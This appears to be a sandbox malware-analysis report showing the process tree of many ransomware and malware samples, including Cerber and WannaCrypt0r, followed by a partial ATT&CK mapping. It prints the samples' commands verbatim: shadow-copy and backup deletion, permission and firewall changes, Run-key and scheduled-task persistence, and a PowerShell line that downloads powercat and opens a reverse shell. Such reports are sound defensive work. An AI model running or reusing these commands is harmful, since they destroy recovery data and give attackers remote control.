                                                                                                                                      • C:\Users\Admin\AppData\Local\TEMPEX~1.EXE
                                                                                                                                        C:\Users\Admin\AppData\Local\TEMPEX~1.EXE
                                                                                                                                        6⤵
                                                                                                                                          PID:1688
                                                                                                                                          • C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\TEMPEX~1Srv.exe
                                                                                                                                            7⤵
                                                                                                                                              PID:2400
                                                                                                                                              • C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\TEMPEX~1SrvSrv.exe
                                                                                                                                                8⤵
                                                                                                                                                  PID:2828
                                                                                                                                                  • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                    "C:\Program Files\Internet Explorer\iexplore.exe"
                                                                                                                                                    9⤵
                                                                                                                                                      PID:400
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\DesktopLayer.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\DesktopLayer.exe"
                                                                                                                                                    8⤵
                                                                                                                                                      PID:1748
                                                                                                                                                      • C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe
                                                                                                                                                        "C:\Program Files (x86)\Microsoft\DesktopLayerSrv.exe"
                                                                                                                                                        9⤵
                                                                                                                                                          PID:3028
                                                                                                                                                          • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                            "C:\Program Files\Internet Explorer\iexplore.exe"
                                                                                                                                                            10⤵
                                                                                                                                                              PID:340
                                                                                                                                                              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:340 CREDAT:275457 /prefetch:2
                                                                                                                                                                11⤵
                                                                                                                                                                  PID:2768
                                                                                                                                                            • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                              "C:\Program Files\Internet Explorer\iexplore.exe"
                                                                                                                                                              9⤵
                                                                                                                                                                PID:1628
                                                                                                                                                          • C:\Windows\svchost.com
                                                                                                                                                            "C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\2E80.tmp\splitterrypted.vbs
                                                                                                                                                            7⤵
                                                                                                                                                              PID:852
                                                                                                                                                              • C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\2E80.tmp\splitterrypted.vbs
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:3024
                                                                                                                                                          • C:\Windows\svchost.com
                                                                                                                                                            "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPSP~1.EXE"
                                                                                                                                                            5⤵
                                                                                                                                                              PID:2280
                                                                                                                                                              • C:\Users\Admin\AppData\Local\TEMPSP~1.EXE
                                                                                                                                                                C:\Users\Admin\AppData\Local\TEMPSP~1.EXE
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:804
                                                                                                                                                                  • C:\Windows\svchost.com
                                                                                                                                                                    "C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\316C.tmp\spwak.vbs
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:1708
                                                                                                                                                                      • C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                        C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\316C.tmp\spwak.vbs
                                                                                                                                                                        8⤵
                                                                                                                                                                          PID:2044
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Endermanch@Cerber5.exe
                                                                                                                                                                "Endermanch@Cerber5.exe"
                                                                                                                                                                3⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                • Suspicious use of UnmapMainImage
                                                                                                                                                                PID:1072
                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                  C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                                  PID:2628
                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                  C:\Windows\system32\netsh.exe advfirewall reset
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                                  PID:2300
                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___4KANNFHR_.hta"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:1080
                                                                                                                                                                  • C:\Windows\SysWOW64\NOTEPAD.EXE
                                                                                                                                                                    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___D895F431_.txt
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Opens file in notepad (likely ransom note)
                                                                                                                                                                    PID:2508
                                                                                                                                                                  • C:\Windows\svchost.com
                                                                                                                                                                    "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /d /c taskkill /f /im "E" > NUL & ping -n 1 127.0.0.1 > NUL & del "C" > NUL && exit
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:2016
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /d /c taskkill /f /im E > NUL & ping -n 1 127.0.0.1 > NUL & del C > NUL && exit
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:804
                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                            taskkill /f /im E
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                            PID:1712
                                                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                            ping -n 1 127.0.0.1
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                            PID:2776
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Endermanch@NoMoreRansom.exe
                                                                                                                                                                      "Endermanch@NoMoreRansom.exe"
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      • Suspicious use of UnmapMainImage
                                                                                                                                                                      PID:2500
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Endermanch@WannaCrypt0r.exe
                                                                                                                                                                      "Endermanch@WannaCrypt0r.exe"
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Drops startup file
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                      PID:2452
                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                        attrib +h .
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                        PID:916
                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                        icacls . /grant Everyone:F /T /C /Q
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                        PID:1092
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                                                                                                                                        taskdl.exe
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:1100
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        cmd /c 103941712738536.bat
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:2168
                                                                                                                                                                          • C:\Windows\SysWOW64\cscript.exe
                                                                                                                                                                            cscript.exe //nologo m.vbs
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            PID:996
                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                          attrib +h +s F:\$RECYCLE
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                          PID:1692
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\@WanaDecryptor@.exe
                                                                                                                                                                          @WanaDecryptor@.exe co
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:1632
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            cmd.exe /c start /b @WanaDecryptor@.exe vs
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:2012
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\@WanaDecryptor@.exe
                                                                                                                                                                                @WanaDecryptor@.exe vs
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:988
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:792
                                                                                                                                                                                      • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                        vssadmin delete shadows /all /quiet
                                                                                                                                                                                        7⤵
                                                                                                                                                                                        • Interacts with shadow copies
                                                                                                                                                                                        PID:2692
                                                                                                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                        wmic shadowcopy delete
                                                                                                                                                                                        7⤵
                                                                                                                                                                                          PID:3012
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                                                                                                                                                                    taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@WanaDecryptor@.exe
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:2072
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\@WanaDecryptor@.exe
                                                                                                                                                                                      @WanaDecryptor@.exe
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:740
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "zuhdaaixrury513" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:2772
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "zuhdaaixrury513" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Modifies registry key
                                                                                                                                                                                            PID:1456
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                                                                                                                                                          taskdl.exe
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:996
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                                                                                                                                                            taskdl.exe
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:1708
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                                                                                                                                                                              taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@WanaDecryptor@.exe
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:1432
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\@WanaDecryptor@.exe
                                                                                                                                                                                                @WanaDecryptor@.exe
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:2740
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                                                                                                                                                                                  taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@WanaDecryptor@.exe
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:876
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\@WanaDecryptor@.exe
                                                                                                                                                                                                    @WanaDecryptor@.exe
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:268
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                                                                                                                                                                      taskdl.exe
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:2564
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                                                                                                                                                                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@WanaDecryptor@.exe
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:4672
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\@WanaDecryptor@.exe
                                                                                                                                                                                                          @WanaDecryptor@.exe
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:4628
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                                                                                                                                                                            taskdl.exe
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:4436
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                                                                                                                                                                                              taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@WanaDecryptor@.exe
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:2248
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\@WanaDecryptor@.exe
                                                                                                                                                                                                                @WanaDecryptor@.exe
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:1584
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                                                                                                                                                                                  taskdl.exe
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:888
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                                                                                                                                                                                                    taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@WanaDecryptor@.exe
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:3768
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\@WanaDecryptor@.exe
                                                                                                                                                                                                                      @WanaDecryptor@.exe
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:4116
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                                                                                                                                                                                        taskdl.exe
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:4132
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                                                                                                                                                                                                          taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@WanaDecryptor@.exe
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:3516
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\@WanaDecryptor@.exe
                                                                                                                                                                                                                            @WanaDecryptor@.exe
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:3384
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                                                                                                                                                                                              taskdl.exe
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                PID:1648
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                                                                                                                                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@WanaDecryptor@.exe
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:2764
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\@WanaDecryptor@.exe
                                                                                                                                                                                                                                  @WanaDecryptor@.exe
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:3776
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                                                                                                                                                                                                    taskdl.exe
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:4948
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                                                                                                                                                                                                                      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@WanaDecryptor@.exe
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:4120
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\@WanaDecryptor@.exe
                                                                                                                                                                                                                                        @WanaDecryptor@.exe
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                          PID:3708
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe
                                                                                                                                                                                                                                        "RIP_YOUR_PC_LOL.exe"
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                        PID:652
                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\1.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\Desktop\1.exe"
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          PID:2540
                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\97BD.tmp\97BE.tmp\97BF.bat C:\Users\Admin\Desktop\1.exe"
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                              PID:2060
                                                                                                                                                                                                                                              • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/2bB2s6
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                PID:1704
                                                                                                                                                                                                                                                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1704 CREDAT:275457 /prefetch:2
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                  PID:2624
                                                                                                                                                                                                                                                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1704 CREDAT:275471 /prefetch:2
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                    PID:2768
                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1704 CREDAT:668675 /prefetch:2
                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                      PID:2340
                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\10.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\Desktop\10.exe"
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                PID:2964
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                  attrib +h .
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                  PID:1292
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                  icacls . /grant Everyone:F /T /C /Q
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                  PID:2020
                                                                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\Desktop\2.doc"
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                PID:1760
                                                                                                                                                                                                                                                • C:\Windows\splwow64.exe
                                                                                                                                                                                                                                                  C:\Windows\splwow64.exe 12288
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                    PID:2064
                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                  • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                  PID:2784
                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\5.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\Desktop\5.exe"
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:5116
                                                                                                                                                                                                                                                    • C:\Windows\svchost.com
                                                                                                                                                                                                                                                      "C:\Windows\svchost.com" "C:\PROGRA~3\system.exe"
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                        PID:4000
                                                                                                                                                                                                                                                        • C:\PROGRA~3\system.exe
                                                                                                                                                                                                                                                          C:\PROGRA~3\system.exe
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                            PID:2012
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                              netsh firewall add allowedprogram "C:\ProgramData\system.exe" "system.exe" ENABLE
                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                                                                                                                                              PID:3156
                                                                                                                                                                                                                                                      • C:\Users\Admin\Desktop\6.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\Desktop\6.exe"
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:808
                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\7.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\Desktop\7.exe"
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                            PID:4464
                                                                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                                                                                              C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                PID:4988
                                                                                                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                                                                                                                C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                  PID:4984
                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\8.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\Desktop\8.exe"
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                  PID:4232
                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\Desktop\9.docm"
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:2444
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      cmd /c powershell -c IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.5.128/powercat.ps1');powercat -c 192.168.5.128 -p 1111 -e cmd
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                                                                                      PID:2528
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        powershell -c IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.5.128/powercat.ps1');powercat -c 192.168.5.128 -p 1111 -e cmd
                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                          PID:760
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe
                                                                                                                                                                                                                                                                    "ska2pwej.aeh.exe"
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                    PID:2916
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-2ESGE.tmp\ska2pwej.aeh.tmp
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-2ESGE.tmp\ska2pwej.aeh.tmp" /SL5="$301AA,4511977,830464,C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe"
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      PID:2736
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe
                                                                                                                                                                                                                                                                    "x2s443bc.cs1.exe"
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                    PID:1000
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-UGE3V.tmp\x2s443bc.cs1.tmp
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-UGE3V.tmp\x2s443bc.cs1.tmp" /SL5="$70124,15784509,779776,C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe"
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      PID:2868
                                                                                                                                                                                                                                                              • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:1864
                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                  • Launches Equation Editor
                                                                                                                                                                                                                                                                  PID:2352
                                                                                                                                                                                                                                                                  • C:\Windows\svchost.com
                                                                                                                                                                                                                                                                    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\EQNEDT32.EXE" -Embedding
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:996
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3582-490\EQNEDT32.EXE
                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\3582-490\EQNEDT32.EXE -Embedding
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                        • Launches Equation Editor
                                                                                                                                                                                                                                                                        PID:2852
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\DllHost.exe
                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:2664
                                                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                      schtasks.exe /create /tn "USER%2~1" /sc ONLOGON /tr "'C:\PerfLogs\Admin\USER%2~1.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                      PID:4080

                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                                                                                                                    Execution

                                                                                                                                                                                                                                                                    Scripting

                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                    T1064

                                                                                                                                                                                                                                                                    Scheduled Task/Job

                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                    Exploitation for Client Execution

                                                                                                                                                                                                                                                                    1
